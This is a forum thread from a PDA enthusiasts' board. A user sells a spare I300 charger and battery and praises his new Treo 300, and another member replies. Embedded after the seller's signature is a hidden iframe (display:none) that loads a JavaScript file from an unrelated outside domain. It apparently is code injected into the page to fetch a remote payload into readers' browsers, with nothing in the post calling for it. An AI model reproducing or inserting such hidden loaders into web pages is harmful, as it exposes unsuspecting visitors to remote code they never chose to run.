+ Reply to Thread

For Sale: I300 Charger and Battery

Hey everyone,

I've been a lurker on this board for many months and have received a lot of great information and tools from the people here. This board convinced me to buy an I300 in January rather than wait for a Treo 180, and I've loved the thing ever since. Having seen a friend's Treo 270, though, and seeing that sprint has the new crazy unlimited data Vision plans, I've decided to make the switch to a Treo 300. I had a Best Buy warranty, and my screen having the funny rings of color around it (which it has had since purchase, and seems to be fairly common) was enough to convince the reps that it was broken, and they gave me a new Treo 300 for only $25 (the price difference). So now I have a Charging cradle and an extra battery that I have no use for. If any of you wants them, make me a reasonable offer and I will ship them off to you. I may also have an extra stylus, but I'll have to dig and see if I can find it before I promise anything.

If any of you are curious about the comparison, I like the Treo 300 considerably more than the I300. I dig the keypad over graffiti, the screen is much larger, brighter, and nicer, and I actually like the form factor a little better as well. Vision is much nicer than the old 2G service I got on my I300 (I think I get around 50-70kbps with Vision), and the always-on unlimited data really changes the way the device can be used.

Anyhow, a big thank you to everyone who has posted information, written hacks, and just generally supported the I300. It's been fun. If you're interested in buying the charger and battery, send me a PM.

Adios all,
    -Dave<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

(Click a sponser today!)
    Dave - hop on over to smartphone central and keep us advised of your successes (and failures) with your new toy. I'll be especially interested, as I haven't decided which way to go in the future.
    Gary